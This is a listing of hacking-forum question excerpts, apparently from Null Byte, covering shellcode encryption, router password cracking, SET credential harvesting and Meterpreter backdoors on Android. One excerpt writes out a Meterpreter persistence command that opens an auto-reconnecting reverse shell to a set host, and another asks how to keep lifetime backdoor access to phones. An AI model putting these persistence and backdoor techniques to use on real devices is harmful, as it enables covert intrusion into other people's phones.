Null Byte Forum

Forum Thread: How to Encrypt a Shellcode ?

Hi, I'm trying to encrypt a shellcode but I can't. Because a shellcode is a string but not an alphanumeric string. I tried with a XOR cipher but the only thing I get when I print the encrypted shellcode on the CMD is a string of strange characters with a length of 3. I don't know what to do to really encrypt this shellcode. I have encrypted the real shellcode, and got it on the cmd, but I get an error when I try to launch it.

Forum Thread: How to Really Become Pro Hacker ?

My question over here is that how could one newbie or even intermediate techie start its path to become pro hacker like even bounty hunter , finding new vulns , exploiting/writing own scripts .Like even though one learn java/any programming languages like java,python,C,C++,etc from sites like codecamp, codecademy they dont teach you stuff about hacking/exploiting . I think my question is clear enough now !

Forum Thread: Efficient Python Based Crawler

i created a python crawler from scratch. it is very efficient ,-i tried to crawl many website (34) some of them are of, more then 400000 pages and it work like a charm. but sometimes it stuck in a loop by try to crawl single page again and again. so please help me to figure out the possible solution (my guess :- its may be because of the characters like -"\n" so how can i filter these type of characters) and its appreciable if test my script in different website and let me know ,if you find a...

Forum Thread: Hacking the BTHub 3/4 (Or Potentially More)

So i was adding a wireless device to my BThub4 and typing in the password i realised that no characters were after f so immediately thinking this hex must be generated someways i delved online and found some material on gnucitizen on a researcher who cracked the generation for the old the old BTHub 1.0 based on the Thomson SpeedTouch 7G and ST790. Although this was WEP encryption to give an idea of how dated this is.

Forum Thread: How Do You Maintain Lifetime Access to Meterpreter Backdoor Even if Your Public IP Is Dynamic?

I want to know whether one can maintain access to the meterpreter backdoor on Android devices over WAN even if the public IP keeps changing. My first thought was to have upload a file on a remote server with my public address and have the meterpreter check on the IP, if its changed it can connect to the new IP else the older one. Though this would require the meterpreter changing its own code and some Ruby for extracting the IP... It was the best I could come up with. Any Ideas ?? (Like Bypas...

Forum Thread: Hostapd-Wpe Not Sending Success

Hi, I was playing around with hostapd-wpe and everything works fine, except for one thing: the success response. I use the -s argument, so hostapd-wpe should respond with a successful authentication when I connect, but instead my login gets rejected. The username and hash are processed and written to the console though. How can I fix this problem?

Forum Thread: Persistence Backdoor for Android (without apk)

Hei I have a question. How can i set up a persistence Backdoor WITHOUT an apk. So I used Stagefright and connected successfullyto the phone. But this command --> run persistence -A -U 30 -p 4444 -r 10.0.0.11 does not work on android. Only on PC. So how can make a persistence connection WITHOUT apk? Or can I install an apk while successfull connected to the phone? Please help me, I am lerning :)

Forum Thread: SET ERROR! Please Help!!

Hello! I am a newbie to kali linux.... I started SET and started credential harvesting..... everything works perfectly. But when i type my ip adress in the browser, it doesnt show the cloned site but it only shows a blank page!! I tried updating my toolkit and everything..... But nothing works. Please help me out!

Forum Thread: How to Run a Bash Environment in Windows 10

Don't get me wrong, i like using a virtual machine or live CD of Kali as much as the next guy. But, at a certain point, it just becomes too long of a process, and so you decide(usually) to just run Kali as your native OS, or you get a separate machine for Kali. I prefer this option though...